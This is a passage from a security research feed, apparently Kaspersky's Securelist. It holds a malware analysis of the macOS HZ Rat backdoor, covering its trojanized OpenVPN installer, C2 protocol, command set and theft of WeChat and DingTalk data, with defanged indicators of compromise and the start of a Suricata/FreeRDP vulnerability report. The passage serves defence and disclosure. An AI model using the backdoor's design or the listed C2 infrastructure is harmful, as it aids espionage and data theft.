  3372. <p>Despite not knowing the malware&#8217;s original distribution point, we managed to find an installation package for one of the backdoor samples. The file is named <pre class="crayon-plain-tag">OpenVPNConnect.pkg</pre>:</p>
  3373. <div id="attachment_113520" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113520" class="size-large wp-image-113520" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-1024x552.png" alt="OpenVPNConnect.pkg on VirusTotal" width="1024" height="552" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-1024x552.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-300x162.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-768x414.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-649x350.png 649w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-740x399.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-519x280.png 519w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-800x432.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01.png 1431w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113520" class="wp-caption-text">OpenVPNConnect.pkg on VirusTotal</p></div>
  3374. <p>It was uploaded to VirusTotal in July 2023 and, at the time of research, wasn&#8217;t detected by any vendor, like other backdoor samples. The installer takes the form of a wrapper for the legitimate &#8220;OpenVPN Connect&#8221; application, while the <pre class="crayon-plain-tag">MacOS</pre> package directory contains two files in addition to the original client: <pre class="crayon-plain-tag">exe</pre> and <pre class="crayon-plain-tag">init</pre>.</p>
  3375. <div id="attachment_113521" style="width: 715px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113521" class="size-full wp-image-113521" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02.png" alt="Structure of the malicious installation package" width="705" height="318" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02.png 705w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02-300x135.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02-621x280.png 621w" sizes="(max-width: 705px) 100vw, 705px" /></a><p id="caption-attachment-113521" class="wp-caption-text">Structure of the malicious installation package</p></div>
  3376. <p>The system determines which file to run when the application is opened using the <pre class="crayon-plain-tag">Info.plist</pre> configuration file. The first one to be launched is the <pre class="crayon-plain-tag">exe</pre> file – a shell script that runs the <pre class="crayon-plain-tag">init</pre> file, then launches the OpenVPN application:</p>
  3377. <div id="attachment_113522" style="width: 543px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153617/hz_rat_attacks_wechat_and_dingtalk_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113522" class="size-full wp-image-113522" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153617/hz_rat_attacks_wechat_and_dingtalk_03.png" width="533" height="133" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153617/hz_rat_attacks_wechat_and_dingtalk_03.png 533w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153617/hz_rat_attacks_wechat_and_dingtalk_03-300x75.png 300w" sizes="(max-width: 533px) 100vw, 533px" /></a><p id="caption-attachment-113522" class="wp-caption-text">Contents of the &#8220;exe&#8221; file</p></div>
  3378. <p>The <pre class="crayon-plain-tag">init</pre> file is the actual backdoor. When launched, it establishes a connection to C2 based on the list of IP addresses specified in the backdoor itself. In most cases, the samples used port 8081 for connection. Additionally, we found backdoor samples using private IP addresses to connect to C2.</p>
  3379. <div id="attachment_113523" style="width: 579px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153649/hz_rat_attacks_wechat_and_dingtalk_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113523" class="size-full wp-image-113523" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153649/hz_rat_attacks_wechat_and_dingtalk_04.png" alt="C2 IP addresses in the backdoor code" width="569" height="220" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153649/hz_rat_attacks_wechat_and_dingtalk_04.png 569w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153649/hz_rat_attacks_wechat_and_dingtalk_04-300x116.png 300w" sizes="(max-width: 569px) 100vw, 569px" /></a><p id="caption-attachment-113523" class="wp-caption-text">C2 IP addresses in the backdoor code</p></div>
  3380. <p>All communication with C2 is encrypted using XOR with the key 0x42. To initialize a session, the backdoor sends a random four-byte value, labeled <pre class="crayon-plain-tag">cookie</pre> in the code. Each message has the following structure:</p>
  3381. <ol>
  3382. <li>Message code (1 byte);</li>
  3383. <li>Message length (4 bytes);</li>
  3384. <li>Message text, where the first 4 bytes contain the data size.</li>
  3385. </ol>
  3386. <p>The executable file is written in C++ and contains debugging information, making it easy to identify:</p>
  3387. <div id="attachment_113525" style="width: 375px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153729/hz_rat_attacks_wechat_and_dingtalk_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113525" class="size-full wp-image-113525" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153729/hz_rat_attacks_wechat_and_dingtalk_05.png" alt="Trojan class with malicious payload" width="365" height="258" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153729/hz_rat_attacks_wechat_and_dingtalk_05.png 365w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153729/hz_rat_attacks_wechat_and_dingtalk_05-300x212.png 300w" sizes="(max-width: 365px) 100vw, 365px" /></a><p id="caption-attachment-113525" class="wp-caption-text">Trojan class with malicious payload</p></div>
  3388. <p>The backdoor supports only four basic commands:</p>
  3389. <table width="100%">
  3390. <tbody>
  3391. <tr>
  3392. <td style="text-align: center" width="10%"><strong>Code</strong></td>
  3393. <td style="text-align: center" width="40%"><strong>Function name</strong></td>
  3394. <td style="text-align: center" width="50%"><strong>Description</strong></td>
  3395. </tr>
  3396. <tr>
  3397. <td>3, 8, 9</td>
  3398. <td>execute_cmdline</td>
  3399. <td>Execute shell command</td>
  3400. </tr>
  3401. <tr>
  3402. <td>4</td>
  3403. <td>write_file</td>
  3404. <td>Write file to disk</td>
  3405. </tr>
  3406. <tr>
  3407. <td>5</td>
  3408. <td>download_file</td>
  3409. <td>Send file to server</td>
  3410. </tr>
  3411. <tr>
  3412. <td>11</td>
  3413. <td>ping</td>
  3414. <td>Check victim&#8217;s availability</td>
  3415. </tr>
  3416. </tbody>
  3417. </table>
  3418. <p>As part of our investigation, we obtained shell commands from the C2 server used to collect the following data about the victim:</p>
  3419. <ul>
  3420. <li>System Integrity Protection (SIP) status;</li>
  3421. <li>System and device information, including:
  3422. <ul>
  3423. <li>Local IP address;</li>
  3424. <li>Information about Bluetooth devices;</li>
  3425. <li>Information about available Wi-Fi networks, available wireless network adapters and the network the device is connected to;</li>
  3426. <li>Hardware specifications;</li>
  3427. <li>Data storage information;</li>
  3428. </ul>
  3429. </li>
  3430. <li>List of applications;</li>
  3431. <li>User information from WeChat;</li>
  3432. <li>User and organization information from DingTalk;</li>
  3433. <li>Username/website value pairs from Google Password Manager.</li>
  3434. </ul>
  3435. <div id="attachment_113526" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113526" class="size-large wp-image-113526" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-1024x498.png" alt="Getting data from WeChat" width="1024" height="498" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-1024x498.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-300x146.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-768x374.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-719x350.png 719w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-740x360.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-576x280.png 576w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-800x389.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06.png 1369w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113526" class="wp-caption-text">Getting data from WeChat</p></div>
  3436. <p>The malware attempts to obtain the victim&#8217;s WeChatID, email and phone number from WeChat. This data is stored in plain text in the <pre class="crayon-plain-tag">userinfo.data</pre> file.</p>
  3437. <p>As for DingTalk, attackers are interested in more detailed victim data:</p>
  3438. <ul>
  3439. <li>Name of the organization and department where the user works;</li>
  3440. <li>Username;</li>
  3441. <li>Corporate email address;</li>
  3442. <li>Phone number.</li>
  3443. </ul>
  3444. <p>The script tries to get this data from the <pre class="crayon-plain-tag">orgEmployeeModel</pre> file. If this file is missing, the malware searches for the user&#8217;s phone number and email in the <pre class="crayon-plain-tag">sAlimailLoginEmail</pre> file. If it fails again, it attempts to find the user&#8217;s email in one of the DingTalk cache files named <pre class="crayon-plain-tag">&lt;date&gt;.holmes.mapping</pre>. These files are also not encrypted and store data in plain text.</p>
  3445. <div id="attachment_113527" style="width: 800px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113527" class="size-full wp-image-113527" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07.png" alt="Getting data from DingTalk" width="790" height="808" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07.png 790w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-293x300.png 293w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-768x785.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-342x350.png 342w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-740x757.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-274x280.png 274w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-50x50.png 50w" sizes="(max-width: 790px) 100vw, 790px" /></a><p id="caption-attachment-113527" class="wp-caption-text">Getting data from DingTalk</p></div>
  3446. <h2 id="infrastructure">Infrastructure</h2>
  3447. <p>At the time of the study, four control servers were active and returning malicious commands. In some cases, as mentioned, among the specified IP addresses there were private ones as well. Such samples were likely used to control a victim&#8217;s device with a previously infected computer within their local network that was used as a proxy to redirect the connection to the C2 server. Typically, this helps to hide the presence of malware on the network, since only the device with the proxy will communicate with C2.</p>
  3448. <p>Some of the detected IP addresses have already been seen in malware attacks targeting Windows devices. Their appearance dates back to 2022, with one of the addresses showing up in HZ Rat attacks of that time.</p>
  3449. <p>Almost all of the C2 servers we found are sited in China. The exceptions are two addresses located in the US and the Netherlands.</p>
  3450. <p>We also found that the installation package mentioned above, according to VirusTotal, was previously downloaded from a domain belonging to MiHoYo, a Chinese video game developer:</p><pre class="crayon-plain-tag">hxxp://vpn.mihoyo[.]com/uploads/OpenVPNConnect.zip.</pre><p>
  3451. It is not yet known for sure how this file got to the legitimate domain and whether the company was hacked.</p>
  3452. <h2 id="conclusion">Conclusion</h2>
  3453. <p>The macOS version of HZ Rat we found shows that the threat actors behind the previous attacks are still active. During the investigation, the malware was only collecting user data, but it could later be used to move laterally across the victim&#8217;s network, as suggested by the presence of private IP addresses in some samples. The collected data about victims&#8217; companies and contact information could be used to spy on people of interest and lay the groundwork for future attacks. Also noteworthy is the fact that at the time of the study we had not encountered the use of two of the backdoor commands (write file to disk and send file to server), so the full scope of the attackers&#8217; intentions remains unclear.</p>
  3454. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  3455. <p><strong>MD5 file hashes</strong><br />
  3456. <strong>Backdoor</strong><br />
  3457. <a href="https://opentip.kaspersky.com/0c3201d0743c63075b18023bb8071e73/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bc3d685c5199eacf&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0c3201d0743c63075b18023bb8071e73</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3458. <a href="https://opentip.kaspersky.com/6cc838049ece4fcb36386b7a3032171f/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b28b9cfa49919632&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6cc838049ece4fcb36386b7a3032171f</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3459. <a href="https://opentip.kaspersky.com/6d478c7f94d95981eb4b6508844050a6/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______576861f5c8a1872d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6d478c7f94d95981eb4b6508844050a6</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3460. <a href="https://opentip.kaspersky.com/7a66cd84e2d007664a66679e86832202/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b978b88fd988255d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7a66cd84e2d007664a66679e86832202</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3461. <a href="https://opentip.kaspersky.com/7ed3fc831922733d70fb08da7a244224/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______10cc60dcd33c1c78&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7ed3fc831922733d70fb08da7a244224</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3462. <a href="https://opentip.kaspersky.com/9cdb61a758afd9a893add4cef5608914/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______421e27265211899d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9cdb61a758afd9a893add4cef5608914</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3463. <a href="https://opentip.kaspersky.com/287ccbf005667b263e0e8a1ccfb8daec/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b167d0e93470a1ac&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">287ccbf005667b263e0e8a1ccfb8daec</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3464. <a href="https://opentip.kaspersky.com/7005c9c6e2502992017f1ffc8ef8a9b9/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______38ce376d1a454cbe&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7005c9c6e2502992017f1ffc8ef8a9b9</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3465. <a href="https://opentip.kaspersky.com/7355e0790c111a59af377babedee9018/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b9999bda92259713&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7355e0790c111a59af377babedee9018</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3466. <a href="https://opentip.kaspersky.com/a5af0471e31e5b11fd4d3671501dfc32/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______df7e3c50f424a308&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">a5af0471e31e5b11fd4d3671501dfc32</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3467. <a href="https://opentip.kaspersky.com/da07b0608195a2d5481ad6de3cc6f195/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4540bf7237939e3a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">da07b0608195a2d5481ad6de3cc6f195</a> &#8211; Mach-O 64-bit x86_64 executable<br />
  3468. <a href="https://opentip.kaspersky.com/dd71b279a0bf618bbe9bb5d934ce9caa/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7d370d71c36e402c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dd71b279a0bf618bbe9bb5d934ce9caa</a> &#8211; Mach-O 64-bit x86_64 executable</p>
  3469. <p><strong>Malicious installation package</strong><br />
  3470. <a href="https://opentip.kaspersky.com/8d33f667ca135a88f5bf77a0fab209d4/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8504592d7372f453&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8d33f667ca135a88f5bf77a0fab209d4</a> &#8211; Apple software package</p>
  3471. <p><strong>C2 IP addresses</strong><br />
  3472. <a href="https://opentip.kaspersky.com/111.21.246.147/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9903d53ff2b50e8b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">111.21.246[.]147</a><br />
  3473. <a href="https://opentip.kaspersky.com/123.232.31.206/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e3542328703b87d0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">123.232.31[.]206</a><br />
  3474. <a href="https://opentip.kaspersky.com/120.53.133.226/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a94e77445cafe7c0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">120.53.133[.]226</a><br />
  3475. <a href="https://opentip.kaspersky.com/218.193.83.70/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______282efd4c95d05cc1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">218.193.83[.]70</a><br />
  3476. <a href="https://opentip.kaspersky.com/29.40.48.21/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0977d34fcc5968c8&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">29.40.48[.]21</a><br />
  3477. <a href="https://opentip.kaspersky.com/47.100.65.182/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______16cda96f783e34ff&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">47.100.65[.]182</a><br />
  3478. <a href="https://opentip.kaspersky.com/58.49.21.113/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______81c7c28a2a20618e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">58.49.21[.]113</a><br />
  3479. <a href="https://opentip.kaspersky.com/113.125.92.32/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c40c8cf92211e838&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">113.125.92[.]32</a><br />
  3480. <a href="https://opentip.kaspersky.com/218.65.110.180/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2276dbe5f0e621e6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">218.65.110[.]180</a><br />
  3481. <a href="https://opentip.kaspersky.com/20.60.250.230/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3c4a7fde091a33af&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">20.60.250[.]230</a></p>
  3482. ]]></content:encoded>
  3483. <wfw:commentRss>https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/feed/</wfw:commentRss>
  3484. <slash:comments>2</slash:comments>
  3485. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured.jpg" width="1200" height="753"><media:keywords>full</media:keywords></media:content>
  3486. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  3487. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  3488. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  3489. </item>
  3490. <item>
  3491. <title>Memory corruption vulnerabilities in Suricata and FreeRDP</title>
  3492. <link>https://securelist.com/suricata-freerdp-memory-corruption/113489/</link>
  3493. <comments>https://securelist.com/suricata-freerdp-memory-corruption/113489/#respond</comments>
  3494. <dc:creator><![CDATA[Dmitry Shmoylov, Evgeny Legerov, Denis Skvortsov]]></dc:creator>
  3495. <pubDate>Thu, 22 Aug 2024 10:00:34 +0000</pubDate>
  3496. <category><![CDATA[Vulnerability reports]]></category>
  3497. <category><![CDATA[FreeRDP]]></category>
  3498. <category><![CDATA[Fuzzing]]></category>
  3499. <category><![CDATA[KasperskyOS]]></category>
  3500. <category><![CDATA[Memory corruption]]></category>
  3501. <category><![CDATA[Suricata]]></category>
  3502. <category><![CDATA[Vulnerabilities]]></category>
  3503. <category><![CDATA[Vulnerabilities and exploits]]></category>
  3504. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113489</guid>
  3505.  
  3506. <description><![CDATA[While pentesting KasperskyOS-based Thin Client and IoT Secure Gateway, we found several vulnerabilities in the Suricata and FreeRDP open-source projects. We shared details on these vulnerabilities with the community along with our fuzzer.]]></description>
  3507. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>As a cybersecurity company, before we release our products, we perform penetration tests on them to make sure they are secure. Recently, new versions of KasperskyOS-based products were released, namely Kaspersky Thin Client (KTC) and Kaspersky IoT Secure Gateway (KISG). As part of the pre-release penetration testing, we analyzed two open-source components used in these products, namely <a href="https://suricata.io/" target="_blank" rel="noopener">Suricata</a> and <a href="https://www.freerdp.com/" target="_blank" rel="noopener">FreeRDP</a> projects, and discovered several vulnerabilities, which we reported to the developers of the corresponding libraries, as well as sharing <a href="https://github.com/ergnoorr/fuzzrdp" target="_blank" rel="noopener">the fuzzing tests</a> we used to test FreeRDP.</p>
  3508. <p>The community confirmed the reported issues and registered the following CVEs:</p>
  3509. <ul>
  3510. <li>FreeRDP: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32041" target="_blank" rel="noopener">CVE-2024-32041</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32039" target="_blank" rel="noopener">CVE-2024-32039</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32040" target="_blank" rel="noopener">CVE-2024-32040</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32458" target="_blank" rel="noopener">CVE-2024-32458</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32459" target="_blank" rel="noopener">CVE-2024-32459</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32460" target="_blank" rel="noopener">CVE-2024-32460</a></li>
  3511. <li>Suricata: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32664" target="_blank" rel="noopener">CVE-2024-32664</a></li>
  3512. </ul>
  3513. <p>Later, using our fuzzing tests, the community found about <a href="https://github.com/FreeRDP/FreeRDP/releases/tag/3.5.1" target="_blank" rel="noopener">10 more vulnerabilities in FreeRDP</a>. All issues were fixed in both open-source projects and in our products prior to the new version releases.</p>
  3514. <h2 id="open-source-components-in-kasperskyos-based-products">Open-source components in KasperskyOS-based products</h2>
  3515. <p>KasperskyOS is a microkernel operating system designed to build <a href="https://os.kaspersky.com/technologies/" target="_blank" rel="noopener">Cyber Immune</a> products. The attack surface is minimized by the built-in security mechanisms, the small size of the microkernel and domain (component) isolation. The latter allows secure implementation of open-source components: even if a particular component contains vulnerabilities, the isolation prevents most of the damage that could be caused by their exploitation.</p>
  3516. <p>The KasperskyOS-based products in question are complex, support various protocols and applications and include open-source components that implement some of their functions. As its name suggests, <a href="https://www.freerdp.com/" target="_blank" rel="noopener">FreeRDP</a> is an open-source implementation of Remote Desktop Protocol. It is used in Kaspersky Thin Client, where it is responsible for remote connection capabilities.</p>
  3517. <p><a href="https://suricata.io/" target="_blank" rel="noopener">Suricata</a> is a network monitoring, intrusion detection and prevention system developed by the Open Information Security Foundation and the Suricata community. It is widely used and implemented by most public and private organizations. When it comes to KasperskyOS-based products, Suricata is used in KISG, where it is responsible for detecting network attacks. It receives a copy of network traffic, analyzes it according to a set of rules and issues alerts if an attack is detected.</p>
  3518. <p>Although component isolation in KasperskyOS ensures the security of our products even if an open-source component contains vulnerabilities, when assessing the security of our products we follow the defense-in-depth approach. The OS design minimizes the attack surface, but it can&#8217;t stop cybercriminals and high-profile actors from trying to find a way to penetrate the system. That&#8217;s why we test (and, if necessary, fix) all components of our products, including the open-source projects we use.</p>
  3519. <p>Penetration testing begins by describing the entire attack surface, which includes all components and all known attack vectors against them.</p>
  3520. <h2 id="cve-2024-32664-out-of-bounds-write-in-suricata">CVE-2024-32664: out-of-bounds write in Suricata</h2>
  3521. <p>During our penetration testing activities we found three issues in Suricata. Two of them were considered bad practice, and one was registered as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32664" target="_blank" rel="noopener">CVE-2024-32664</a>. The vulnerability affects all Suricata versions from 6.0.0 to 6.0.18 and from 7.0.0 to 7.0.4, and is fixed in versions 6.0.19 and 7.0.5. It was initially assessed as being a medium severity issue (CVSS 5.3). However, in the tickets on the Open Information Security Foundation website, the severity was changed to <a href="https://redmine.openinfosecfoundation.org/issues/6905?tab=history" target="_blank" rel="noopener">high</a> for versions 7.0.x and to <a href="https://redmine.openinfosecfoundation.org/issues/6931?tab=notes" target="_blank" rel="noopener">critical</a> for 6.0.x.</p>
